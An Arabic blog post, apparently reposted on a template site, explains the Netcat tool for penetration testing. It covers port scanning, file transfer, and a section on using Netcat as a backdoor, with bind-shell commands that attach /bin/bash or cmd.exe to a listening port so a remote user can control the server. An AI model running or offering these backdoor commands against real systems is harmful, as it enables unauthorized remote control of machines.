كل ما تود ان تعرفه عن أداة Netcat للختبار الاختراق --روهاك

مواضيع مفضلة

كل ما تود ان تعرفه عن أداة Netcat للختبار الاختراق --روهاك









Netcat
لهذه الأداة العديد من الخيارات و الاستخدامات المتعددة والخطيرة فتستطيع استعمالها لكثير من الأمور فهي تقوم بإرسال واستقبال البيانات باستعمال ـ TCP & UDP Protocolsلذلك تعد هذه الاداة بالمرتبة الرابعة في قائمة Top 100 Network Security Toolsفحص المنافذ المفتوحة في السيرفر
تستطيع أداة Netcat فحص المنافذ المفتوحة بالسيرفر ولكن Nmapأفضل وأسرع منها في ذلك (سأضع شرح لها قريبا ان شاء الله) وللقيام بهذه العملية نستعمل الأمر
nc -v -w1 SERVER-IP -z FromPort-ToPort

أما بالنسبة للخيارات التي استخدمناها
-v 
لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w 
لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z 
تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 64.233.183.147 -z 1-100

ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 00.000.000.000 -z 1-100 400-500

ملاحظة: 00.000.000.000  هو IP موقع معين على سبيل المثال

نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل:
nc SERVER-IP PORT < FILE

ونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILE

مثال لإرسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.0.45 5555 < data.txt

أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txt

مع جعل اداة Netcat تعمل كـ Backdoorهذه أخطر استعمالات الـ Netcat فهي تشكل خطورة على الجهاز و السيرفر بشكل عام حيث تمتاز أداة  Netcat  بخاصية ارسال البيانات الى برنامج معين مثلcmd.exeفي نظام الويندوز و /bin/bash في نظام لينكس مما يجعلك تستطيع تطبيق أوامر على السيرفر والتحكم به بشكل كامل، ولكي يتم تنفيذ هذه الخاصية باستعمال الأمر:
nc -l -p PORT -e PROGRAM

مع اضافة -d و -L في نظام الويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM –L

مثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bash

على السيرفر اذا كان السيرفر في نظام ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
  /bin/bash الذي يستعمل في نظام لينكس الى cmd.exe الذي يستعمل في نظام الويندوز ليصبح الأمر بالشكل التالي:
nc -l -p 4455 -e -d cmd.exe –L

وللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455


وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر .
---------------------------------------------------------------
روابط التحميل والمشاهدة، الروابط المباشرة للتحميل
او
شاهد هذا الفيديو القصير لطريقة التحميل البسيطة


كيف تحصل على مدونة جاهزة بآلاف المواضيع والمشاركات من هنا
شاهد قناة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على اليوتيوب لمزيد من الشرح من هنا
رابط مدونة منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات في أي وقت حــــتى لو تم حذفها من هنا
شاهد صفحة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على الفيس بوك لمزيد من الشرح من هنا
تعرف على ترتيب مواضيع منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات (حتى لا تختلط عليك الامور) من هنا

ملاحظة هامة: كل عمليات تنزيل، رفع، وتعديل المواضيع الجاهزة تتم بطريقة آلية، ونعتذر عن اي موضوع مخالف او مخل بالحياء مرفوع بالمدونات الجاهزة بآلاف المواضيع والمشاركات، ولكم ان تقوموا بحذف هذه المواضيع والمشاركات والطريقة بسيطة وسهلة. ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــسلامـ.

Post a Comment

المشاركة على واتساب متوفرة فقط في الهواتف